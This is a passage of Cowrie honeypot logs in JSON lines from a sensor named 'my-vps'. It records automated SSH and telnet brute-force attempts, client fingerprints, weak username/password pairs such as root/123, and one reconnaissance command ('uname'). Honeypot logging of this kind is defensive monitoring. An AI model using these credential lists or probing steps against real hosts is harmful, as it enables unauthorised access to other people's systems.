langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:11:09.612305Z","src_ip":"41.226.27.251","session":"f2b5e87f9e08"}
{"eventid":"cowrie.login.failed","username":"docker","password":"docker123","message":"login attempt [docker/docker123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:11:09.768509Z","src_ip":"41.226.27.251","session":"f2b5e87f9e08"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:11:10.999645Z","src_ip":"41.226.27.251","session":"f2b5e87f9e08"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45252,"dst_ip":"1.2.3.4","dst_port":22,"session":"df12db555bd8","protocol":"ssh","message":"New connection: 212.227.235.229:45252 (1.2.3.4:22) [session: df12db555bd8]","sensor":"my-vps","timestamp":"2025-08-31T03:11:14.126136Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:11:14.880251Z","src_ip":"212.227.235.229","session":"df12db555bd8"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:11:14.880929Z","src_ip":"212.227.235.229","session":"df12db555bd8"}
{"eventid":"cowrie.login.failed","username":"git","password":"1234567","message":"login attempt [git/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T03:11:21.845215Z","src_ip":"212.227.235.229","session":"df12db555bd8"}
{"eventid":"cowrie.session.closed","duration":"9.8","message":"Connection lost after 9.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:11:23.885771Z","src_ip":"212.227.235.229","session":"df12db555bd8"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123","message":"login attempt [postgres/123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:11:26.459702Z","src_ip":"212.227.235.229","session":"cfd21a6c0454"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":51092,"dst_ip":"1.2.3.4","dst_port":22,"session":"1724bd5304c5","protocol":"ssh","message":"New connection: 41.226.27.251:51092 (1.2.3.4:22) [session: 1724bd5304c5]","sensor":"my-vps","timestamp":"2025-08-31T03:11:30.153837Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:11:30.154774Z","src_ip":"41.226.27.251","session":"1724bd5304c5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:11:30.199482Z","src_ip":"41.226.27.251","session":"1724bd5304c5"}
{"eventid":"cowrie.login.success","username":"root","password":"123","message":"login attempt [root/123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:11:30.336478Z","src_ip":"41.226.27.251","session":"1724bd5304c5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:11:30.441304Z","src_ip":"41.226.27.251","session":"1724bd5304c5"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:11:30.442024Z","src_ip":"41.226.27.251","session":"1724bd5304c5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:11:30.488068Z","src_ip":"41.226.27.251","session":"1724bd5304c5"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:11:30.489383Z","src_ip":"41.226.27.251","session":"1724bd5304c5"}
{"eventid":"cowrie.session.closed","duration":"40.1","message":"Connection lost after 40.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:11:34.855374Z","src_ip":"212.227.235.229","session":"cfd21a6c0454"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52314,"dst_ip":"1.2.3.4","dst_port":22,"session":"05d6e6b98e05","protocol":"ssh","message":"New connection: 212.227.125.160:52314 (1.2.3.4:22) [session: 05d6e6b98e05]","sensor":"my-vps","timestamp":"2025-08-31T03:11:35.410037Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35292,"dst_ip":"1.2.3.4","dst_port":22,"session":"ffba7f1c8897","protocol":"ssh","message":"New connection: 212.227.125.160:35292 (1.2.3.4:22) [session: ffba7f1c8897]","sensor":"my-vps","timestamp":"2025-08-31T03:11:35.828911Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:11:36.105104Z","src_ip":"212.227.125.160","session":"ffba7f1c8897"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45868,"dst_ip":"1.2.3.4","dst_port":22,"session":"2027b5ebd98f","protocol":"ssh","message":"New connection: 212.227.125.160:45868 (1.2.3.4:22) [session: 2027b5ebd98f]","sensor":"my-vps","timestamp":"2025-08-31T03:11:36.742395Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:11:36.743071Z","src_ip":"212.227.125.160","session":"2027b5ebd98f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:11:36.998193Z","src_ip":"212.227.125.160","session":"2027b5ebd98f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:11:37.216596Z","src_ip":"212.227.125.160","session":"ffba7f1c8897"}
{"eventid":"cowrie.login.failed","username":"infocare","password":"Abc@123456","message":"login attempt [infocare/Abc@123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:11:38.064589Z","src_ip":"212.227.125.160","session":"2027b5ebd98f"}
{"eventid":"cowrie.login.failed","username":"git","password":"1234567","message":"login attempt [git/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T03:11:39.055230Z","src_ip":"212.227.125.160","session":"ffba7f1c8897"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:11:39.319365Z","src_ip":"212.227.125.160","session":"2027b5ebd98f"}
{"eventid":"cowrie.session.closed","duration":30.781078338623047,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:11:40.132764Z","src_ip":"212.227.235.229","session":"49868ea308e8"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:11:40.545255Z","src_ip":"212.227.125.160","session":"ffba7f1c8897"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:11:44.544004Z","src_ip":"212.227.125.160","session":"05d6e6b98e05"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:11:44.545018Z","src_ip":"212.227.125.160","session":"05d6e6b98e05"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":46428,"dst_ip":"1.2.3.4","dst_port":22,"session":"4aba14068a4c","protocol":"ssh","message":"New connection: 41.226.27.251:46428 (1.2.3.4:22) [session: 4aba14068a4c]","sensor":"my-vps","timestamp":"2025-08-31T03:11:50.103174Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:11:50.136677Z","src_ip":"41.226.27.251","session":"4aba14068a4c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:11:50.150493Z","src_ip":"41.226.27.251","session":"4aba14068a4c"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123456","message":"login attempt [postgres/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:11:50.323789Z","src_ip":"41.226.27.251","session":"4aba14068a4c"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:11:51.520841Z","src_ip":"41.226.27.251","session":"4aba14068a4c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34270,"dst_ip":"1.2.3.4","dst_port":22,"session":"972029ce18c0","protocol":"ssh","message":"New connection: 212.227.235.229:34270 (1.2.3.4:22) [session: 972029ce18c0]","sensor":"my-vps","timestamp":"2025-08-31T03:12:05.746992Z"}
{"eventid":"cowrie.session.connect","src_ip":"79.124.8.120","src_port":56414,"dst_ip":"1.2.3.4","dst_port":23,"session":"3b6b05b2030b","protocol":"telnet","message":"New connection: 79.124.8.120:56414 (1.2.3.4:23) [session: 3b6b05b2030b]","sensor":"my-vps","timestamp":"2025-08-31T03:12:06.242716Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:12:06.282321Z","src_ip":"79.124.8.120","session":"3b6b05b2030b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:12:06.299457Z","src_ip":"79.124.8.120","session":"3b6b05b2030b"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":51830,"dst_ip":"1.2.3.4","dst_port":22,"session":"13509f0a3ad3","protocol":"ssh","message":"New connection: 41.226.27.251:51830 (1.2.3.4:22) [session: 13509f0a3ad3]","sensor":"my-vps","timestamp":"2025-08-31T03:12:10.285036Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:12:10.301042Z","src_ip":"41.226.27.251","session":"13509f0a3ad3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:12:10.330338Z","src_ip":"41.226.27.251","session":"13509f0a3ad3"}
{"eventid":"cowrie.login.failed","username":"dev","password":"dev123456","message":"login attempt [dev/dev123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:12:10.509890Z","src_ip":"41.226.27.251","session":"13509f0a3ad3"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:12:11.790871Z","src_ip":"41.226.27.251","session":"13509f0a3ad3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53036,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab69e95cca1a","protocol":"ssh","message":"New connection: 212.227.235.229:53036 (1.2.3.4:22) [session: ab69e95cca1a]","sensor":"my-vps","timestamp":"2025-08-31T03:12:13.351745Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:12:14.041461Z","src_ip":"212.227.235.229","session":"ab69e95cca1a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:12:14.042479Z","src_ip":"212.227.235.229","session":"ab69e95cca1a"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:12:16.128072Z","src_ip":"212.227.235.229","session":"972029ce18c0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:12:16.128875Z","src_ip":"212.227.235.229","session":"972029ce18c0"}
{"eventid":"cowrie.login.failed","username":"svnuser","password":"123456","message":"login attempt [svnuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:12:18.161972Z","src_ip":"212.227.125.160","session":"05d6e6b98e05"}
{"eventid":"cowrie.login.failed","username":"git","password":"12345678","message":"login attempt [git/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T03:12:20.050370Z","src_ip":"212.227.235.229","session":"ab69e95cca1a"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:12:21.867374Z","src_ip":"212.227.235.229","session":"ab69e95cca1a"}
{"eventid":"cowrie.session.closed","duration":"53.9","message":"Connection lost after 53.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:12:29.339355Z","src_ip":"212.227.125.160","session":"05d6e6b98e05"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":38116,"dst_ip":"1.2.3.4","dst_port":22,"session":"11edb7e8a959","protocol":"ssh","message":"New connection: 41.226.27.251:38116 (1.2.3.4:22) [session: 11edb7e8a959]","sensor":"my-vps","timestamp":"2025-08-31T03:12:30.449186Z"}
